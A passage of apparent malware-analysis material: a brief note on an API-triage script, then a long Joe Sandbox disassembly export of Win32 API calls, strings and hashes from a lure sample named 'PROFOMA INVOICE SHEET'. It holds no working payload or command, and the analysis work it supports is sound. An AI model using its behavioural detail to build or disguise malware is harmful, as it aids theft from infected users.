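        print(name, triage(block))
```

Run it on a whole export by feeding each "APIs" block to `triage` separately; the tags are per function, so a block that only shows InternetConnectW plus a subcall's InternetOpenUrlW still tags as a download worker, which is the level at which the report's own signatures ("Tries to harvest and steal browser information", thread injection) should be reconciled with the code that implements them.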
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00393925
                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0039393A
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00393954
                                    • _wcslen.LIBCMT ref: 00393999
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003939C6
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003939F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcslen
                                    • String ID: SysListView32
                                    • API String ID: 2147712094-78025650
                                    • Opcode ID: 60e73cf6ba86263d27a3eb0e36074a3e26ba2639cbf996779362bb246c7e8be0
                                    • Instruction ID: c9ec85cf8275e791b07eb4fe93f472fd6529f118b8975bd78bb240e55ffec600
                                    • Opcode Fuzzy Hash: 60e73cf6ba86263d27a3eb0e36074a3e26ba2639cbf996779362bb246c7e8be0
                                    • Instruction Fuzzy Hash: 77418571A00219ABEF22DF64CC45FEA7BA9FF08350F150526F958E7281D7719D94CB90
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0036BCFD
                                    • IsMenu.USER32(00000000), ref: 0036BD1D
                                    • CreatePopupMenu.USER32 ref: 0036BD53
                                    • GetMenuItemCount.USER32(01255F90), ref: 0036BDA4
                                    • InsertMenuItemW.USER32(01255F90,?,00000001,00000030), ref: 0036BDCC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                    • String ID: 0$2
                                    • API String ID: 93392585-3793063076
                                    • Opcode ID: 2397fe4d2313edb83e5a5dc2d5cd2f311d39c54163f155f0772ad0686a937585
                                    • Instruction ID: e70c46e8c6d8f6378a3866a7d3304cd6b6d52ff5966e49d1ff5afb7fea445a7f
                                    • Opcode Fuzzy Hash: 2397fe4d2313edb83e5a5dc2d5cd2f311d39c54163f155f0772ad0686a937585
                                    • Instruction Fuzzy Hash: 9A51AF70A002459BDF22CFA9D884BAEFBF8AF45314F14C21AE441DF299D7719981CF61
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00322D4B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00322D53
                                    • _ValidateLocalCookies.LIBCMT ref: 00322DE1
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00322E0C
                                    • _ValidateLocalCookies.LIBCMT ref: 00322E61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: &H2$csm
                                    • API String ID: 1170836740-3052720543
                                    • Opcode ID: e133e1b8a99cc35434a4957b54c3f3ec7cab9aed90d35574ef783e1bd6a5f6d1
                                    • Instruction ID: 69b2824d4462084384f2d5d54761ae2da474ccbb20f6996a558e893723ada1bd
                                    • Opcode Fuzzy Hash: e133e1b8a99cc35434a4957b54c3f3ec7cab9aed90d35574ef783e1bd6a5f6d1
                                    • Instruction Fuzzy Hash: 0441C234E00228ABCF12DF68EC45AAFBBB5BF45324F158155E825AF352D735AA05CBD0
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 0036C913
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 5043a577de5c53d7566d82d48c8297e9a3bbc1845fcaf6b7ae03e3bc1ace6781
                                    • Instruction ID: 67ff7e259a117359c0049c53aea2e98919c4eb3cc1fa068445553a786540531c
                                    • Opcode Fuzzy Hash: 5043a577de5c53d7566d82d48c8297e9a3bbc1845fcaf6b7ae03e3bc1ace6781
                                    • Instruction Fuzzy Hash: 1C113A326A9306BAE7079B54AC83DFA37DCDF15354B20902FF544EA282E7B15E005364
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$LocalTime
                                    • String ID:
                                    • API String ID: 952045576-0
                                    • Opcode ID: 9e78b3e2a438f9e147c566547e9a05091cb986e1d7926a4daca3da157c7f6e5c
                                    • Instruction ID: ff5c9f48feff151a7089bf2297276dd61ef7c08a799ceeca720b32a69c5df105
                                    • Opcode Fuzzy Hash: 9e78b3e2a438f9e147c566547e9a05091cb986e1d7926a4daca3da157c7f6e5c
                                    • Instruction Fuzzy Hash: AD416275C10228B5CB12EBF4988A9CFB7A8AF49710F508966E518E7122FB34E255C3E5
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0031F953
                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0035F3D1
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0035F454
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 6b6bc9c835bbab0065b16fa9b736a43a1421ad57264940b230ee5b94aa920061
                                    • Instruction ID: c26825fc130f1670f6d013741c5447931bd63f91a5b27ab48032390d59cd75fd
                                    • Opcode Fuzzy Hash: 6b6bc9c835bbab0065b16fa9b736a43a1421ad57264940b230ee5b94aa920061
                                    • Instruction Fuzzy Hash: 4F414E31208640BFD73FBB29C888BAA7B99AF4E325F59443DE44756970C73298C5CB11
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00392D1B
                                    • GetDC.USER32(00000000), ref: 00392D23
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00392D2E
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00392D3A
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00392D76
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00392D87
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00395A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00392DC2
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00392DE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 003415CE
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00341651
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003416E4
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003416FB
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00341777
                                    • __freea.LIBCMT ref: 003417A2
                                    • __freea.LIBCMT ref: 003417AE
                                    Similarity
                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 2829977744-0
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2610073882-625585964
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0037125C
                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00371284
                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003712A8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003712D8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0037135F
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003713C4
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00371430
                                    Similarity
                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                    • String ID:
                                    • API String ID: 2550207440-0
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0038396B
                                    • CharUpperBuffW.USER32(?,?), ref: 00383A7A
                                    • _wcslen.LIBCMT ref: 00383A8A
                                    • VariantClear.OLEAUT32(?), ref: 00383C1F
                                      • Part of subcall function 00370CDF: VariantInit.OLEAUT32(00000000), ref: 00370D1F
                                      • Part of subcall function 00370CDF: VariantCopy.OLEAUT32(?,?), ref: 00370D28
                                      • Part of subcall function 00370CDF: VariantClear.OLEAUT32(?), ref: 00370D34
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4137639002-1221869570
                                    APIs
                                      • Part of subcall function 0036000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?,?,0036035E), ref: 0036002B
                                      • Part of subcall function 0036000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360046
                                      • Part of subcall function 0036000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360054
                                      • Part of subcall function 0036000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?), ref: 00360064
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00384C51
                                    • _wcslen.LIBCMT ref: 00384D59
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00384DCF
                                    • CoTaskMemFree.OLE32(?), ref: 00384DDA
                                    Similarity
                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 614568839-2785691316
                                    APIs
                                    • GetMenu.USER32(?), ref: 00392183
                                    • GetMenuItemCount.USER32(00000000), ref: 003921B5
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003921DD
                                    • _wcslen.LIBCMT ref: 00392213
                                    • GetMenuItemID.USER32(?,?), ref: 0039224D
                                    • GetSubMenu.USER32(?,?), ref: 0039225B
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003922E3
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Similarity
                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                    • String ID:
                                    • API String ID: 4196846111-0
                                    APIs
                                    • GetParent.USER32(?), ref: 0036AEF9
                                    • GetKeyboardState.USER32(?), ref: 0036AF0E
                                    • SetKeyboardState.USER32(?), ref: 0036AF6F
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0036AF9D
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0036AFBC
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0036AFFD
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0036B020
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    APIs
                                    • GetParent.USER32(00000000), ref: 0036AD19
                                    • GetKeyboardState.USER32(?), ref: 0036AD2E
                                    • SetKeyboardState.USER32(?), ref: 0036AD8F
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0036ADBB
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0036ADD8
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0036AE17
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0036AE38
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    APIs
                                    • GetConsoleCP.KERNEL32(00343CD6,?,?,?,?,?,?,?,?,00335BA3,?,?,00343CD6,?,?), ref: 00335470
                                    • __fassign.LIBCMT ref: 003354EB
                                    • __fassign.LIBCMT ref: 00335506
                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00343CD6,00000005,00000000,00000000), ref: 0033552C
                                    • WriteFile.KERNEL32(?,00343CD6,00000000,00335BA3,00000000,?,?,?,?,?,?,?,?,?,00335BA3,?), ref: 0033554B
                                    • WriteFile.KERNEL32(?,?,00000001,00335BA3,00000000,?,?,?,?,?,?,?,?,?,00335BA3,?), ref: 00335584
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    APIs
                                      • Part of subcall function 0038304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                      • Part of subcall function 0038304E: _wcslen.LIBCMT ref: 0038309B
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00381112
                                    • WSAGetLastError.WSOCK32 ref: 00381121
                                    • WSAGetLastError.WSOCK32 ref: 003811C9
                                    • closesocket.WSOCK32(00000000), ref: 003811F9
                                    Similarity
                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 2675159561-0
                                    • Opcode ID: ce2d93211b0111773e3b169e6d5188e305e06ec26fdb06be259d88baa2a6184d
                                    • Instruction ID: 65ab8a7a78869c8a3404c5d279928aa8cb0927e0e1e6a6dc74403b257c3ba50c
                                    • Opcode Fuzzy Hash: ce2d93211b0111773e3b169e6d5188e305e06ec26fdb06be259d88baa2a6184d
                                    • Instruction Fuzzy Hash: 1E41F431600204AFDB12AF54C889BAAB7EDEF45764F148199F9059F291C771AE42CBA1
                                    APIs
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0036CF22,?), ref: 0036DDFD
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0036CF22,?), ref: 0036DE16
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0036CF45
                                    • MoveFileW.KERNEL32(?,?), ref: 0036CF7F
                                    • _wcslen.LIBCMT ref: 0036D005
                                    • _wcslen.LIBCMT ref: 0036D01B
                                    • SHFileOperationW.SHELL32(?), ref: 0036D061
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 3164238972-1173974218
                                    • Opcode ID: 862e76ead4355cb711379c4f114e9f300603a08186dca95599a6ed692c0075cf
                                    • Instruction ID: 67c05502dfc9cf282379e37d913040407170f32e5d504f2c0aeceb8111f51e8f
                                    • Opcode Fuzzy Hash: 862e76ead4355cb711379c4f114e9f300603a08186dca95599a6ed692c0075cf
                                    • Instruction Fuzzy Hash: 18415571D452189FDF13EBA4D981AEEB7BCAF08380F0040E6E545EF146EB74A688CB50
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00392E1C
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392E4F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392E84
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00392EB6
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00392EE0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392EF1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00392F0B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: ba064929aec236bf0603a72d53500e977077df7c9fcac46ad8a4bd59728744c0
                                    • Instruction ID: 436c2dcbc04d5836a11a7ef2ab5e51174910b69665539ea21a8338c320eea67f
                                    • Opcode Fuzzy Hash: ba064929aec236bf0603a72d53500e977077df7c9fcac46ad8a4bd59728744c0
                                    • Instruction Fuzzy Hash: 1D310335A05540AFDF22DF18ECD4F6677A8EB4A710F1A1165F9018B2B2CB71AC409B50
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367769
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036778F
                                    • SysAllocString.OLEAUT32(00000000), ref: 00367792
                                    • SysAllocString.OLEAUT32(?), ref: 003677B0
                                    • SysFreeString.OLEAUT32(?), ref: 003677B9
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003677DE
                                    • SysAllocString.OLEAUT32(?), ref: 003677EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 03c2c6262d7839e406321d433fafe76f6ca6738c53fcff6d88cb292b6c0db5c9
                                    • Instruction ID: e1b841131dad0431fc4e433921079644c7cad81da3649e60f0ea916a6e5f7493
                                    • Opcode Fuzzy Hash: 03c2c6262d7839e406321d433fafe76f6ca6738c53fcff6d88cb292b6c0db5c9
                                    • Instruction Fuzzy Hash: 6621C176608219AFDF12EFA8CD88CBB77ACEB09368B448026FA14DB154D674DC418774
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367842
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367868
                                    • SysAllocString.OLEAUT32(00000000), ref: 0036786B
                                    • SysAllocString.OLEAUT32 ref: 0036788C
                                    • SysFreeString.OLEAUT32 ref: 00367895
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003678AF
                                    • SysAllocString.OLEAUT32(?), ref: 003678BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: d37d573ac9e76656518fab8f406bcff38c52d682dbc1e5bce21080d6d23eafa1
                                    • Instruction ID: 551f4b57a1d058f8d629386a7b5c1dd0fbc010b1c092ebf3dd3503026f7a1c80
                                    • Opcode Fuzzy Hash: d37d573ac9e76656518fab8f406bcff38c52d682dbc1e5bce21080d6d23eafa1
                                    • Instruction Fuzzy Hash: 4221A131608204AFDB12AFB8DC8DDAA77ECEB09764B50C125F915CB2A5D670DC81CB74
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 003704F2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0037052E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 82714dbadcde1ba5ba4dd117fdc5abe8b7ec7a9083639799ff176d23253a9adc
                                    • Instruction ID: 360706d6bb37a9fa42e581090c5eb437b9b938a41614a020b77bed159ce67ac5
                                    • Opcode Fuzzy Hash: 82714dbadcde1ba5ba4dd117fdc5abe8b7ec7a9083639799ff176d23253a9adc
                                    • Instruction Fuzzy Hash: 5521DD74504305EBDF369F28CC44A9A7BA8AF46734F208A19F8E9E62E0D7749940CF20
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 003705C6
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00370601
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
